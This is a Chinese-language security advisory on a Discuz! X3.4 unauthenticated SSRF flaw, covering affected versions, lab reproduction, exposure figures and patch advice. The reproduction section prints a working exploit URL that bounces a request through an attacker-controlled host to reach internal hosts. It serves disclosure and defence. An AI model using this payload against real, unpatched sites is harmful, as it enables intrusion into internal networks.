一、漏洞概述

1 简介

Crossday Discuz! Board[1](简称 Discuz!)是北京康盛新创科技有限责任公司推出 的一套通用的社区论坛软件系统。自 2001 年 6 月面世以来，Discuz!已拥有 15 年以上的应 用历史和 200 多万网站用户案例，是全球成熟度最高、覆盖率最大的论坛软件系统之一。

2018 年 12 月 03 日，安全研究员 l3m0n 公开了一个 Discuz 3.4 的前台 SSRF 漏 洞[3]。通过该漏洞，攻击者可以在未登录的情况下利用 SSRF 漏洞攻击内网主机。

2018 年 12 月 5 日， Seebug 漏洞平台收录了该漏洞[4]，知道创宇 404 实验室漏洞情 报团队开始漏洞应急。

2 影响版本

该漏洞影响:
Git 版本小于 41eb5bb0a3a716f84b0ce4e4feb41e6f25a980a3 且 PHP 的版本 > 5.3
且 php-curl 版本 <= 7.54
且 运行在 80 端口的 Discuz

二、漏洞复现

1 复现环境

Windows 10
Apache 2.4.23
PHP 7.0.10
Discuz git commit a5c1b95dc4464ee3da0ebd4655d30867f85d6ae9

2 复现过程及结果

攻击者主机 IP: 172.16.4.128 Discuz 主机 IP: 172.16.4.159

步骤 1: 访问 home.php?mod=spacecp&ac=pm 获取 formhash 的值

步骤 2: 攻击者在其主机上构造 302 跳转页面，跳转内容是攻击 payload。

步骤 3: 根据步骤 1 获取到的 formhash 访问如下链接: http://172.16.4.159/upload//misc.php?mod=imgcropper&picflag=2&imgcroppersubmit=1&

cutimg=/127.0.0.1:80/..//upload/member.php%3fmod%3dlogging%26action%3dlogout%26referer%3dhttp%3a//a%2523%2540172.16.4.128%26quickforward%3d1&XDEBUG_SE SSION_START=19482&formhash=cf419bf4

其中 172.16.4.128 即为攻击者的主机 IP

访问该链接后， Discuz 将会通过 php-curl 请求攻击者主机，再通过 302 跳转请求攻击者

可控的内网地址。例如步骤 2 中的 172.16.4.159:8000。

三、漏洞影响范围

根据 ZoomEye 网络空间搜索引擎[5]对关键字 +app:"Discuz!" 进行搜索，共得到 119216 条 IP 历史记录，主要分布在中国、美国等国家。

 

四、防护方案

1、Discuz 官方早在 2018/11/06 就在其 git 项目主页[2]修复了该漏洞，请用户及时更 新 Discuz 代码。

2、通过升级当前服务器的 php，也可以预防该 SSRF 漏洞。经测试，该漏洞不影响 php-curl 大于 7.54 的版本。

3、技术业务咨询
知道创宇技术业务咨询热线 : 400-060-9587(政府，国有企业)、028-68360638(互联网企业)

五、相关链接

[1] Discuz 官网
http://www.discuz.net/
[2] Discuz Git 项目主页
https://gitee.com/ComsenzDiscuz/DiscuzX
[3] Discuz x3.4 前台 SSRF 漏洞详情 https://www.cnblogs.com/iamstudy/articles/discuz_x34_ssrf_1.html
[4] Seebug 漏洞收录
https://www.seebug.org/vuldb/ssvid-97704
[5] ZoomEye 网络空间搜索引擎 https://www.zoomeye.org/searchResult?q=%2Bapp%3A%22Discuz!%22